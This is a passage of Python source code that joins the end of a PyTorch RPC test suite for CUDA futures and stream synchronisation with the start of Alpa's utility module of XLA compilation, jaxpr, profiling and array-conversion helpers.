def test_cuda_future_can_extract_cuda_tensor(self):
self._test_cuda_future_extraction(
wrapper=lambda t: t, unwrapper=lambda v: v, sparse_tensor=False
)
@skip_if_lt_x_gpu(1)
def test_cuda_future_can_extract_list_with_cuda_tensor(self):
self._test_cuda_future_extraction(
wrapper=lambda t: [t], unwrapper=lambda v: v[0], sparse_tensor=False
)
@skip_if_lt_x_gpu(1)
def test_cuda_future_can_extract_custom_class_with_cuda_tensor(self):
self._test_cuda_future_extraction(
wrapper=lambda t: TensorWrapper(t), unwrapper=lambda v: v.tensor, sparse_tensor=False
)
@skip_if_lt_x_gpu(2)
def test_cuda_future_callback_changes_devices(self):
# We check proper CUDA stream synchronization by filling the tensor with
# the expected value in one stream, and reading it from another stream.
tensor0 = torch.zeros((100,), device="cuda:0")
tensor1 = torch.zeros((100,), device="cuda:1")
parent_future = Future(devices=["cuda:0", "cuda:1"])
def cb(fut):
t0 = fut.value()
tensor1.copy_(t0, non_blocking=True)
return tensor1
child_future = parent_future.then(cb)
with torch.cuda.device("cuda:0"):
stream = torch.cuda.Stream()
with torch.cuda.stream(stream):
torch.cuda._sleep(int(1000 * get_cycles_per_ms()))
tensor0.fill_(1)
parent_future.set_result(tensor0)
with torch.cuda.device("cuda:1"):
another_stream = torch.cuda.Stream()
with torch.cuda.stream(another_stream):
self.assertTrue(torch.eq(child_future.wait(), 1).all().item())
@skip_if_lt_x_gpu(2)
def test_cuda_future_value_on_bad_device(self):
tensor0 = torch.zeros((100,), device="cuda:0")
tensor1 = torch.zeros((100,), device="cuda:1")
parent_future = Future(devices=["cuda:1"])
# As a plus, we test that futures still invoke callbacks even in case of
# error, and that the child futures are successful if those callbacks
# don't access the parent future.
def cb(fut):
with torch.cuda.device("cuda:1"):
torch.cuda._sleep(int(1000 * get_cycles_per_ms()))
tensor1.fill_(1)
return tensor1
child_future = parent_future.then(cb)
with torch.cuda.device("cuda:0"):
stream = torch.cuda.Stream()
with torch.cuda.stream(stream):
torch.cuda._sleep(int(1000 * get_cycles_per_ms()))
tensor0.fill_(1)
parent_future.set_result(tensor0)
with self.assertRaisesRegex(
ValueError,
r"The result contained tensors residing on device\(s\) cuda:0 "
r"which are not among the expected device\(s\) cuda:1",
):
parent_future.wait()
with torch.cuda.device("cuda:1"):
another_stream = torch.cuda.Stream()
with torch.cuda.stream(another_stream):
self.assertTrue(torch.eq(child_future.wait(), 1).all().item())
@skip_if_lt_x_gpu(1)
def test_async_execution_with_cuda_future(self):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {"cuda:0": "cuda:0"})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
t = torch.zeros((100,), device="cuda:0")
fut = rpc.rpc_async(dst, async_cuda_sleep_and_set_to_one, args=(t,))
another_stream = torch.cuda.Stream("cuda:0")
with torch.cuda.stream(another_stream):
self.assertTrue(torch.eq(fut.wait(), 1).all().item())
rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_async_execution_nested_with_cuda_future(self):
dst = worker_name((self.rank + 1) % self.world_size)
nested_dst = worker_name((self.rank + 2) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {"cuda:0": "cuda:0"})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
a = torch.ones((100,), device="cuda:0")
b = torch.ones((100,), device="cuda:0")
c = torch.ones((100,), device="cuda:0")
fut = rpc.rpc_async(dst, async_cuda_nested_add, args=(nested_dst, a, b, c))
another_stream = torch.cuda.Stream("cuda:0")
with torch.cuda.stream(another_stream):
self.assertTrue(torch.eq(fut.wait(), 3).all().item())
rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_cuda_future_modify_tensor_inplace(self):
tensor = torch.zeros((100,), device="cuda:0")
future = Future(devices=["cuda:0"])
future.set_result(tensor)
# It's weird to modify the value of a future once it's complete, but
# technically possible. Currently this is considered undefined behavior
# (in practice the future will ignore the modification and still
# synchronize with the original value). We could one day add logic to
# detect and warn or throw in such cases, but for now we just check that
# this doesn't crash.
tensor.fill_(1)
future.wait()
@skip_if_lt_x_gpu(1)
def test_cuda_future_replace_tensor(self):
tensor_list = [torch.zeros((100,), device="cuda:0")]
future = Future(devices=["cuda:0"])
future.set_result(tensor_list)
# It's weird to modify the value of a future once it's complete, but
# technically possible. Currently this is considered undefined behavior
# (in practice the future will ignore the modification and still
# synchronize with the original value). We could one day add logic to
# detect and warn or throw in such cases, but for now we just check that
# this doesn't crash.
# We set things up so that the original tensor contained in the list
# gets deleted once we replace it with the other one. This will
# invalidate any cached information held by the future.
tensor_list[0] = torch.ones((100,), device="cuda:0")
future.wait()
@skip_if_lt_x_gpu(1)
def test_rref_with_unpickleable_attributes(self):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {"cuda:0": "cuda:0"})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
rref = rpc.remote(dst, TensorWrapper, args=(torch.zeros(42, device="cuda:0"),))
rref.rpc_sync().increase(1)
ret = rref.rpc_sync().sum()
self.assertEqual(ret, 42)
rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_cuda_future_can_extract_cuda_sparse_tensor(self):
self._test_cuda_future_extraction(
wrapper=lambda t: t, unwrapper=lambda v: v, sparse_tensor=True
)
@skip_if_lt_x_gpu(1)
def test_cuda_future_can_extract_list_with_cuda_sparse_tensor(self):
self._test_cuda_future_extraction(
wrapper=lambda t: [t], unwrapper=lambda v: v[0], sparse_tensor=True
)
@skip_if_lt_x_gpu(1)
def test_cuda_future_can_extract_custom_class_with_cuda_sparse_tensor(self):
self._test_cuda_future_extraction(
wrapper=lambda t: TensorWrapper(t), unwrapper=lambda v: v.tensor, sparse_tensor=True
)
|
util.py | # pylint: disable=consider-using-enumerate
"""Common utilities."""
import functools
import itertools as it
import logging
import os
import subprocess
import re
import time
from collections import OrderedDict
from functools import partial, partialmethod
import threading
from typing import Sequence, Any, Union
from warnings import warn
import jax
import jax.numpy as jnp
from jax._src import dispatch
from jax._src.api import FLAGS, ShapeDtypeStruct
from jax._src.dlpack import from_dlpack, to_dlpack
from jax._src.lib import xla_bridge as xb, xla_client as xc, xla_extension as xe
from jax.api_util import shaped_abstractify
from jax.core import (Atom, ClosedJaxpr, DropVar, Jaxpr, JaxprEqn, Literal,
ShapedArray, Var, AbstractValue)
from jax.experimental.maps import FrozenDict
from jax import linear_util as lu
from jax.interpreters import partial_eval as pe
from jax.interpreters import xla, pxla
from jax.interpreters.xla import _DeviceArray
from jax.tree_util import tree_map, tree_flatten, PyTreeDef
import numpy as np
import flax
from flax.training import train_state
import ray
import tqdm
import cupy as cp
from alpa.global_env import global_config, is_worker
########################################
##### Alpa API Utilities
########################################
logger = logging.getLogger(__name__)
def freeze_dict(pytree: PyTreeDef):
"""Convert a pytree to a FrozenDict."""
def is_leaf(x):
return isinstance(x, dict)
def freeze(x):
if isinstance(x, dict):
return FrozenDict(x)
return x
return tree_map(freeze, pytree, is_leaf)
def auto_static_argnums(args: Sequence[Any]):
"""Return the indices of static arguments according to heuristic rules."""
def is_static_arg(arg):
if isinstance(arg, (bool, int, float, str)):
return True
if isinstance(arg, (flax.optim.base.Optimizer, train_state.TrainState)):
return False
xs, _ = tree_flatten(arg)
for x in xs:
try:
x = shaped_abstractify(x)
except TypeError:
return True
return False
return tuple(i for i in range(len(args)) if is_static_arg(args[i]))
def auto_donate_argnums(args: Sequence[Any]):
"""Return the indices of donated arguments according to heuristic rules."""
def should_donate(x):
# Always donate optimizer
if isinstance(x, (flax.optim.base.Optimizer, train_state.TrainState)):
return True
return False
return tuple(i for i in range(len(args)) if should_donate(args[i]))
def abstractify_with_aval(x):
if isinstance(x, ShapedArray):
return x
elif isinstance(x, ShapeDtypeStruct):
return ShapedArray(x.shape, x.dtype, named_shape=x.named_shape)
else:
return xla.abstractify(x)
def tree_to_nparray(tree):
"""Convert a pytree to a pytree of numpy array."""
def convert_to_nparray(x):
if hasattr(x, "__array__"):
return np.asanyarray(x)
return x
return tree_map(convert_to_nparray, tree)
def update_jax_platform(platform):
"""Update the jax backend platform."""
jax.config.update("jax_platform_name", platform)
xb.get_backend.cache_clear()
########################################
##### Data Structure Utilities
########################################
def to_int_tuple(array: np.ndarray):
"""Convert a numpy array to int tuple."""
if array is None:
return tuple()
return tuple(int(x) for x in array)
def check_arithmetic_sequence(array: np.ndarray):
"""Check the input 1-D array is an arithmetic sequence. Return
the delta if Ture and None otherwise."""
if len(array) < 2:
return None
delta = array[1] - array[0]
for i in range(2, len(array)):
if array[i] - array[i - 1] != delta:
return None
return delta
class OrderedSet:
"""An ordered set implemented by using the built-in OrderedDict."""
def __init__(self, iterable=()):
self.dict = OrderedDict()
for element in iterable:
self.dict[element] = None
def add(self, *args):
for x in args:
self.dict[x] = None
def update(self, other):
for x in other:
self.dict[x] = None
def union(self, other):
result = OrderedSet()
result.update(self)
result.update(other)
return result
def intersection_update(self, other):
to_be_removed = []
for x in self:
if x not in other:
to_be_removed.append(x)
for x in to_be_removed:
self.remove(x)
def intersection(self, other):
result = OrderedSet()
for x in self:
if x in other:
result.add(x)
return result
def discard(self, element):
if element in self:
del self.dict[element]
def remove(self, element):
if element not in self:
raise KeyError(element)
del self.dict[element]
def clear(self):
self.dict.clear()
def difference(self, other):
result = OrderedSet()
for x in self:
if x not in other:
result.add(x)
return result
def difference_update(self, other):
for x in other:
self.discard(x)
def symmetric_difference(self, other):
result = OrderedSet()
for x in self:
if x not in other:
result.add(x)
for x in other:
if x not in self:
result.add(x)
return result
def __iter__(self):
for x in self.dict:
yield x
def __len__(self):
return len(self.dict)
def __contains__(self, element):
return element in self.dict
def __repr__(self):
return "OrderedSet([" + ", ".join(repr(x) for x in self) + "])"
def __or__(self, other):
return self.union(other)
def __and__(self, other):
return self.intersection(other)
def __sub__(self, other):
return self.difference(other)
def __xor__(self, other):
return self.symmetric_difference(other)
def __ior__(self, other):
self.update(other)
def __iand__(self, other):
self.intersection_update(other)
def __isub__(self, other):
self.difference_update(other)
def __eq__(self, other):
if isinstance(other, OrderedSet):
return self.dict == other.dict
return False
@classmethod
def __class_getitem__(cls, item):
return f"{cls.__name__}[{item.__name__}]"
class DisjointDict:
"""A dictionary for recursive lookup.
Path compression is used to avoid excess of maximum recursion depth."""
def __init__(self):
self.values = {}
def update(self, keys, values):
for key, value in zip(keys, values):
self.values[key] = value
def recursive_lookup(self, key):
lookup_queue = [key]
value = None
while len(lookup_queue) > 0:
k = lookup_queue.pop()
if value is not None:
self.values[k] = value
continue
if k not in self.values:
value = k
continue
lookup_queue.append(k)
lookup_queue.append(self.values[k])
return value
def keys(self):
return list(self.values.keys())
def cached_property(fn, *args, **kwargs):
"""
Decorator to make a function a "cached property".
This means that it is a property whose return value is cached after the
first time it is called.
Args:
fn: The function to be made a cached property
*args: Any args for the function
**kwargs: Any kwargs for the function
Returns:
function
"""
return property(functools.lru_cache()(fn, *args, **kwargs))
########################################
##### XLA API Utilities
########################################
def get_compile_options(num_replicas: int, num_partitions: int,
device_assignment: np.ndarray,
use_spmd_partitioning: bool,
parameter_is_tupled_arguments: int,
build_random_seed: int):
"""Return CompileOptions for XLA compilation."""
compile_options = xb.get_compile_options(
num_replicas=num_replicas,
num_partitions=num_partitions,
device_assignment=device_assignment,
use_spmd_partitioning=use_spmd_partitioning,
)
compile_options.parameter_is_tupled_arguments = (
parameter_is_tupled_arguments)
compile_options.executable_build_options.seed = build_random_seed
return compile_options
def jaxpr_to_hlo_module(name: str, closed_jaxpr: ClosedJaxpr,
donated_invars: Sequence[bool], backend):
"""Convert a jaxpr to an XLA HloModule.
Reference code: jax/jax/_src/dispatch.py::lower_xla_callable
"""
backend_name = backend.platform
in_avals = [var.aval for var in closed_jaxpr.jaxpr.invars]
consts = closed_jaxpr.consts
map(dispatch.prefetch,
it.chain(consts, dispatch.jaxpr_literals(closed_jaxpr.jaxpr)))
# Convert jaxpr to XLA HLO
tuple_args = False
axis_env = xla.AxisEnv(nreps=1, names=(), sizes=())
name_stack = xla.new_name_stack(xla.wrap_name(name, "parallelize"))
c = xc.XlaBuilder(name)
xla_consts = xla._xla_consts(c, consts) # pylint: disable=protected-access
xla_args, donated_invars = xla._xla_callable_args( # pylint: disable=protected-access
c,
in_avals,
tuple_args,
donated_invars=donated_invars)
ctx = xla.TranslationContext(c, backend_name, axis_env, name_stack)
out_nodes = xla.jaxpr_subcomp(ctx, closed_jaxpr.jaxpr, xla_consts,
*xla_args)
out_tuple = xc.ops.Tuple(c, out_nodes)
# Set up aliases (donating invars)
if donated_invars:
if backend.platform in ("gpu", "tpu"):
donation_results = xla.set_up_aliases(c, xla_args,
c.GetShape(out_tuple),
donated_invars, tuple_args)
if any(donation_results):
unused_donations = [
str(c.GetShape(a))
for a, d in zip(xla_args, donation_results)
if d
]
warn_msg = ", ".join(unused_donations)
warn(f"Some donated buffers were not usable: {warn_msg}")
return c.build(out_tuple).as_hlo_module()
def setup_computation_alias(xla_computation: Union[xc.XlaComputation,
xe.HloModule],
donated_invars: Sequence[bool]):
"""Set input/output alias in xla computation.
Assume the tensors in output tuple strictly match the donated parameters.
"""
program_shape = xla_computation.program_shape()
parameter_shapes = program_shape.parameter_shapes()
result_shapes = program_shape.result_shape().tuple_shapes()
assert len(parameter_shapes) == len(donated_invars), (
"Zhuohan: This error might be caused by an error in "
"XLA stage slicing.")
p_in = 0
p_out = 0
while p_in < len(parameter_shapes) and p_out < len(result_shapes):
if donated_invars[p_in]:
if parameter_shapes[p_in] == result_shapes[p_out]:
xla_computation.setup_alias((p_out,), p_in, ())
p_in += 1
p_out += 1
else:
p_out += 1
else:
p_in += 1
while p_in < len(parameter_shapes):
if donated_invars[p_in]:
warn("Some vars are not donated")
p_in += 1
def count_communication_primitives(hlo_ir: str,
ignore_scalar_all_reduce: bool = False):
"""Count the communication primitives in a HLO IR."""
total = hlo_ir.count("channel_id")
all_reduce = hlo_ir.count("all-reduce(") + hlo_ir.count("all-reduce-start(")
all_gather = hlo_ir.count("all-gather(") + hlo_ir.count("all-gather-start(")
reduce_scatter = hlo_ir.count("reduce-scatter(") + hlo_ir.count(
"reduce-scatter-start(")
all_to_all = hlo_ir.count("all-to-all(") + hlo_ir.count("all-to-all-start(")
if ignore_scalar_all_reduce:
# Ignore allreduce of scalar values
scalar_all_reduce = 0
scalar_all_reduce += hlo_ir.count("all-reduce(f32[]")
scalar_all_reduce += hlo_ir.count("all-reduce-start(f32[]")
scalar_all_reduce += hlo_ir.count("all-reduce(f16[]")
scalar_all_reduce += hlo_ir.count("all-reduce-start(f16[]")
total -= scalar_all_reduce
all_reduce -= scalar_all_reduce
return total, all_reduce, all_gather, reduce_scatter, all_to_all
def compile_dummy_zero_constant(backend, num_devices: int):
"""Compile an XLA executable that returns a constant zero."""
c = xc.XlaBuilder("dummy_zero_constant")
sharding = xc.OpSharding()
sharding.type = sharding.type.REPLICATED
c.set_sharding(sharding)
zero = xc.ops.Constant(c, np.array(0, dtype=np.dtype(np.int32)))
c.clear_sharding()
c = c.build(xc.ops.Tuple(c, [zero]))
compile_options = xb.get_compile_options(
num_replicas=1,
num_partitions=num_devices,
device_assignment=np.arange(num_devices).reshape((1, -1)),
use_spmd_partitioning=True,
)
compiled = backend.compile(c, compile_options)
return compiled
def compile_allocate_zero_buffers(backend, num_devices: int,
shapes: Sequence[Sequence[int]],
dtypes: Sequence[jnp.dtype]):
"""Compile an XLA executable that returns zero buffers with given shape and
dtypes."""
c = xc.XlaBuilder("allocate_zero_buffers")
sharding = xc.OpSharding()
sharding.type = sharding.type.REPLICATED
c.set_sharding(sharding)
ret = []
for shape, dtype in zip(shapes, dtypes):
zero = xc.ops.Constant(c, np.array(0, dtype=dtype))
zero = xc.ops.Broadcast(zero, shape)
ret.append(zero)
c.clear_sharding()
c = c.build(xc.ops.Tuple(c, ret))
compile_options = xb.get_compile_options(
num_replicas=1,
num_partitions=num_devices,
device_assignment=np.arange(num_devices).reshape((1, -1)),
use_spmd_partitioning=True,
)
compiled = backend.compile(c, compile_options)
return compiled
def compile_memset_zero_buffers(backend, num_devices: int,
shapes: Sequence[Sequence[int]],
dtypes: Sequence[jnp.dtype]):
"""
Compile an XLA executable that memset zero buffers with given shape and
dtypes. Try to avoid memcpy
"""
c = xc.XlaBuilder("allocate_zero_buffers")
args = []
sharding = xc.OpSharding()
sharding.type = sharding.type.REPLICATED
c.set_sharding(sharding)
for shape, dtype in zip(shapes, dtypes):
args.append(
xc.ops.Parameter(c, len(args),
xc.shape_from_pyval(np.ones(shape, dtype))))
sharding_tuple = xc.OpSharding()
sharding_tuple.type = sharding.type.TUPLE
sharding_tuple.tuple_shardings = [sharding for _ in shapes]
c.set_sharding(sharding_tuple)
input_params = xc.ops.Tuple(c, args)
c.set_sharding(sharding)
output_shape = xc.Shape.scalar_shape(np.dtype(np.float32))
output_tuple = xc.ops.CustomCall(c,
b"__builtin$MemZero",
operands=(input_params,),
shape=output_shape)
c = c.build(output_tuple)
compile_options = xb.get_compile_options(
num_replicas=1,
num_partitions=num_devices,
device_assignment=np.arange(num_devices).reshape((1, -1)),
use_spmd_partitioning=True,
)
compiled = backend.compile(c, compile_options)
return compiled
def compile_concatenate(backend, mesh_shape, sharding_spec, batch_size,
batch_dim, aval):
num_devices = np.prod(mesh_shape)
sharding = pxla.sharding_spec_sharding_proto(sharding_spec)
build_random_seed = global_config.compile_random_seed
compile_options = get_compile_options(
num_replicas=1,
num_partitions=num_devices,
device_assignment=np.arange(num_devices).reshape((1, -1)),
use_spmd_partitioning=True,
parameter_is_tupled_arguments=False,
build_random_seed=build_random_seed)
c = xc.XlaBuilder("concatenate buffers")
c.set_sharding(sharding)
operands = []
for batch_idx in range(batch_size):
operands.append(
xc.ops.Parameter(
c, batch_idx,
xc.shape_from_pyval(np.ones(aval.shape, aval.dtype))))
concated = xc.ops.ConcatInDim(c, operands, batch_dim)
c = c.build(concated)
compiled = backend.compile(c, compile_options)
hlo_proto = compiled.hlo_modules()[0].as_serialized_hlo_module_proto()
return hlo_proto
def get_shard_shape(aval: ShapedArray, sharding_spec: pxla.ShardingSpec):
"""Return the shape of a shard."""
shape = []
for dim, spec_dim in zip(aval.shape, sharding_spec.sharding):
if isinstance(spec_dim, pxla.NoSharding):
shape.append(dim)
elif isinstance(spec_dim, pxla.Chunked):
shape.append(dim // np.prod(spec_dim.chunks))
elif isinstance(spec_dim, pxla.Unstacked):
shape.append(spec_dim.size)
return tuple(shape)
def get_microbatch_sharding_spec(spec: pxla.ShardingSpec, batch_dim,
num_micro_batch):
batch_dim_chunks = [num_micro_batch]
if isinstance(spec.sharding[batch_dim], pxla.Chunked):
batch_dim_chunks.extend(spec.sharding[batch_dim].chunks)
batch_dim_axis = 0
for sharding in spec.sharding[:batch_dim]:
if isinstance(sharding, pxla.Chunked):
batch_dim_axis += 1
new_sharding = list(spec.sharding)
new_sharding[batch_dim] = pxla.Chunked(batch_dim_chunks)
new_mapping = []
for mapping in spec.mesh_mapping:
if isinstance(mapping, pxla.Replicated):
new_mapping.append(mapping)
continue
assert isinstance(mapping, pxla.ShardedAxis)
new_axis = mapping.axis
if mapping.axis >= batch_dim_axis:
new_axis += 1
new_mapping.append(pxla.ShardedAxis(new_axis))
new_mapping.append(pxla.ShardedAxis(batch_dim_axis))
return pxla.ShardingSpec(sharding=tuple(new_sharding),
mesh_mapping=tuple(new_mapping))
class XlaPassContext:
"""A global context for passing arguments from python to XLA c++ passes."""
current = None
def __init__(self, value_dict):
self.value_dict = value_dict
def __enter__(self):
assert XlaPassContext.current is None, (
"Do not support recurrent context")
XlaPassContext.current = self
xe.set_pass_context(self.value_dict)
def __exit__(self, exc_type, exc_value, exc_traceback):
XlaPassContext.current = None
xe.clear_pass_context()
########################################
##### Jaxpr Utilities
########################################
def clone_jaxpr(closed_jaxpr: ClosedJaxpr,
invars: Sequence[Atom] = None,
outvars: Sequence[Var] = None,
eqns: Sequence[JaxprEqn] = None,
constvars: Sequence[Var] = None,
consts: Sequence = None):
"""Clone a jaxpr and replace members if they are provided."""
constvars = constvars or closed_jaxpr.jaxpr.constvars
invars = invars or closed_jaxpr.jaxpr.invars
outvars = outvars or closed_jaxpr.jaxpr.outvars
eqns = eqns or closed_jaxpr.jaxpr.eqns
consts = consts or closed_jaxpr.consts
jaxpr = Jaxpr(constvars, invars, outvars, eqns)
return ClosedJaxpr(jaxpr, consts)
def trace_jaxpr_with_micro_batch(fun: lu.WrappedFun,
batch_invars: Sequence[bool],
num_micro_batches: int,
raw_avals: Sequence[AbstractValue],
batch_dim: int = 0):
"""Trace the jaxpr of the computation of a micro batch."""
assert batch_dim == 0, "Only support batch_dim == 0"
avals = []
batch_size = None
for aval, is_batch_var in zip(raw_avals, batch_invars):
if is_batch_var:
assert aval.shape[0] % num_micro_batches == 0, (
"The batch dimension must be divisable by num_micro_batches.")
if batch_size is None:
batch_size = aval.shape[0] // num_micro_batches
else:
assert batch_size == aval.shape[0] // num_micro_batches, (
"The batch dimension must be the same for all batch vars.")
shape = (batch_size,) + aval.shape[1:]
avals.append(aval.update(shape=shape))
else:
avals.append(aval)
with jax.disable_jit():
jaxpr, _, consts = pe.trace_to_jaxpr_final(fun, avals)
closed_jaxpr = ClosedJaxpr(jaxpr, consts)
return closed_jaxpr, batch_size
def slices_to_jaxpr(
closed_jaxpr: ClosedJaxpr,
sliced_eqns: Sequence[Sequence[JaxprEqn]]) -> Sequence[ClosedJaxpr]:
"""Wrap sliced equations to a list of ClosedJaxpr."""
n_eqns = len(sliced_eqns)
global_invars = OrderedSet(closed_jaxpr.jaxpr.invars)
global_outvars = OrderedSet(
var for var in closed_jaxpr.jaxpr.outvars if isinstance(var, Var))
global_consts = dict(zip(closed_jaxpr.jaxpr.constvars, closed_jaxpr.consts))
layer_invars = [OrderedSet() for _ in range(n_eqns)]
layer_outvars = [OrderedSet() for _ in range(n_eqns)]
layer_consts = [{} for _ in range(n_eqns)]
var_layer_dict = {} # Dict[var -> layer_idx]
for i, eqns in enumerate(sliced_eqns):
for eqn in eqns:
for var in eqn.invars:
if isinstance(var, Literal):
continue
if var in global_consts:
layer_consts[i][var] = global_consts[var]
elif var in global_invars:
layer_invars[i].add(var)
elif var_layer_dict[var] != i:
layer_invars[i].add(var)
layer_outvars[var_layer_dict[var]].add(var)
else:
assert var_layer_dict[var] == i
for var in eqn.outvars:
if not isinstance(var, DropVar):
var_layer_dict[var] = i
if var in global_outvars:
layer_outvars[i].add(var)
result = []
for i, eqns in enumerate(sliced_eqns):
new_jaxpr = Jaxpr(list(layer_consts[i].keys()), list(layer_invars[i]),
list(layer_outvars[i]), eqns)
new_closed_jaxpr = ClosedJaxpr(new_jaxpr,
list(layer_consts[i].values()))
result.append(new_closed_jaxpr)
return result
def get_var_mapping(mapping, var):
"""map the var to a new value if var is Var and in the mapping."""
if isinstance(var, Var) and var in mapping:
return mapping[var]
else:
return var
def log_jaxpr(jaxpr: ClosedJaxpr, filename: str):
"""Print jaxpr int a temporary file for debugging purposes."""
path = "/tmp/" + filename
with open(path, "w", encoding="utf-8") as f:
f.write(str(jaxpr))
########################################
##### Profiling Utilities
########################################
def profile_xla_executable(compiled, backend, local_devices):
"""Measure the time costs of a xla executable with dummy inputs."""
hlo_module = compiled.hlo_modules()[0]
cost_failed = [np.inf] * 3
# Allocate dummy buffers
input_shapes = hlo_module.parameter_shapes()
# prune OOM cases, not exact because third party lib not considered:
free_mem = local_devices[0].available_memory()
input_bytes = 0
for shape in input_shapes:
input_bytes += np.prod(
shape.dimensions()) * shape.numpy_dtype().itemsize
if free_mem < compiled.total_allocation_size() and free_mem != -1:
return cost_failed
device_inputs = []
try:
for shape in input_shapes:
device_inputs.append([
backend.buffer_from_pyval(
np.empty(shape.dimensions(), shape.numpy_dtype()), device)
for device in local_devices
])
local_devices[0].synchronize_all_activity()
except RuntimeError:
return cost_failed
# Run benchmark
def run_func():
device_outputs = compiled.execute_sharded_on_local_devices(
device_inputs)
# Reset the value for donate buffers
ct = 0
for j in range(len(device_inputs)):
if device_inputs[j][0].is_deleted():
device_inputs[j] = device_outputs[ct]
ct += 1
local_devices[0].synchronize_all_activity()
try:
costs = benchmark_func(run_func, repeat=3, number=3)
except RuntimeError:
costs = cost_failed
return costs
def benchmark_func(run_func,
sync_func=None,
warmup=1,
repeat=3,
number=5,
min_repeat_second=None):
"""
Benchmark the execution time of a function.
The function is executed for (warmup + number * repeat) times.
The return value is a list of `repeat` elements and each elements is
the average execution time of `number` executions.
If `min_repeat_second` is set, the function automatically picks a `number`
so that one `repeat` lasts for at least `min_repeat_second` seconds.
"""
costs = []
# Warmup
for _ in range(warmup):
run_func()
# Choose a "number" according to "min_repeat_second"
if min_repeat_second:
if sync_func:
sync_func()
tic = time.time()
run_func()
if sync_func:
sync_func()
toc = time.time()
cost = toc - tic
number = max(int(min_repeat_second / cost), 1)
# Benchmark
for _ in range(repeat):
if sync_func:
sync_func()
tic = time.time()
for _ in range(number):
run_func()
if sync_func:
sync_func()
costs.append(time.time() - tic)
return np.array(costs) / number
def run_with_timeout(func, args=(), kwargs=None, timeout=None):
"""Run a function with timeout."""
ret_value = []
def _target_func():
ret_value.append(func(*args, **(kwargs or {})))
t = threading.Thread(target=_target_func)
t.start()
t.join(timeout=timeout)
if t.is_alive():
raise TimeoutError
if not ret_value:
raise RuntimeError
return ret_value[0]
########################################
##### Array conversion
########################################
def is_continuous_subset(tensor_slice, tensor_shape, row_major=True):
"""
Figure out whether a slice is a continuous subset of the tensor.
Args:
slice_shape (Sequence(slice)): the shape of the slice.
tensor_shape (Sequence(int)): the shape of the tensor.
row_major (bool): whether the tensor layout is row-majored.
Returns:
is_continuous (bool)
"""
if not row_major:
raise NotImplementedError("Do not support column major.")
ndim = len(tensor_shape)
if len(tensor_slice) != ndim:
raise RuntimeError("ndims mismatch.")
slice_shape = tuple(ind.stop - ind.start for ind in tensor_slice)
for dim, dim_shape in enumerate(slice_shape):
if dim + 1 > ndim:
return True
if dim_shape == 1:
continue
return slice_shape[dim + 1:] == tensor_shape[dim + 1:]
def infer_offset_and_n_elements(tensor_slice):
"""Calculate the offset and #elements before making NCCL calls.
This function assumes the slice is a continuous subset of the original
tensor.
"""
slice_shape = tuple(ind.stop - ind.start for ind in tensor_slice)
offset = tuple()
n_elements = np.prod(slice_shape)
for dim, dim_shape in enumerate(slice_shape):
offset = offset + (tensor_slice[dim].start,)
if dim_shape > 1:
break
return offset, n_elements
def xla_buffer_to_jax_tensor(xla_buf):
"""
Convert an xla buffer to a JAX DeviceArray.
So we can index over the data buffer.
"""
aval = ShapedArray(xla_buf.shape, xla_buf.dtype)
return _DeviceArray(aval, xla_buf.device(), xla_buf)
def jax_tensor_to_xla_buffer(jax_buf):
"""Convert a JAX Device array back to XLA buffer."""
return jax_buf.device_buffer
def xla_buffer_to_cupy(xla_buf, take_ownership=False):
"""Convert an xla buffer directly to cupy, w/o transitioning from jax
buffer."""
return cp.fromDlpack(
xc._xla.buffer_to_dlpack_managed_tensor( # pylint: disable=protected-access
xla_buf,
take_ownership=take_ownership))
def cupy_to_xla_buffer(tensor):
"""Convert cupy tensors to XLA buffers."""
if isinstance(tensor, list):
return list(map(cupy_to_xla_buffer, tensor))
cpu_backend = xb.get_backend("cpu")
try:
gpu_backend = xb.get_backend("gpu")
except RuntimeError:
gpu_backend = None
buf = xc._xla.dlpack_managed_tensor_to_buffer( # pylint: disable=protected-access
tensor.toDlpack(), cpu_backend, gpu_backend)
return buf
def jax_tensor_to_cupy(tensors, take_ownership=False):
"""Convert a Jax DeviceArray to cupy tensor; zero copy."""
if isinstance(tensors, list):
return list(map(jax_tensor_to_cupy, tensors))
return cp.fromDlpack(to_dlpack(tensors, take_ownership=take_ownership))
def cupy_to_jax_tensor(tensors):
"""Convert cupy tensors to JAX tensors."""
if isinstance(tensors, list):
return list(map(cupy_to_jax_tensor, tensors))
return from_dlpack(tensors.toDlpack())
# Note: use Python jit instead of CPP jit,
# because CPP jit has bugs on _DeviceArray.
if is_worker:
FLAGS.experimental_cpp_jit = False
# Note(Hao): this function will be jit-ed into as many versions as the possible
# length of start_indices
@partial(jax.jit, donate_argnums=0, static_argnums=2)
def jax_tensor_set(src_buf, update, start_indices):
"""
In-place write on a JAX buffer.
Args:
src_buf: JAX device array.
update: JAX device array.
start_indices (tuple[int]): tuple of integers indicating the starting
indices.
"""
# src_buf = src_buf.at[indices].set(update)
src_buf = jax.lax.dynamic_update_slice(src_buf, update, start_indices)
return src_buf
@partial(jax.jit, static_argnums=(1, 2))
def jax_tensor_index(src_tensor, indices, size):
dst_tensor = jax.lax.dynamic_slice(src_tensor, indices, size)
return dst_tensor
########################################
##### OS / IO Utilities
########################################
def run_cmd(cmd: str):
"""Run a bash command."""
print(cmd)
ret = os.system(cmd)
return ret
def list_gpu_info():
"""List all gpu information by calling nvidia-sim."""
ret = subprocess.getoutput("nvidia-smi -L")
visible_devices = os.environ.get("CUDA_VISIBLE_DEVICES", None)
if visible_devices:
ids = [int(x) for x in visible_devices.split(",")]
lines = ret.split("\n")
lines = [lines[i] for i in ids]
ret = "\n".join(lines)
return ret
def disable_tqdm_globally():
"""Disable tqdm globally."""
tqdm.tqdm.__init__ = partialmethod(tqdm.tqdm.__init__, disable=True)
def get_num_hosts_and_num_devices(args):
"""Get the number of hosts and the number of devices per host for benchmark
scripts."""
if args.num_hosts is not None or args.num_devices_per_host is not None:
assert (args.num_hosts is not None and
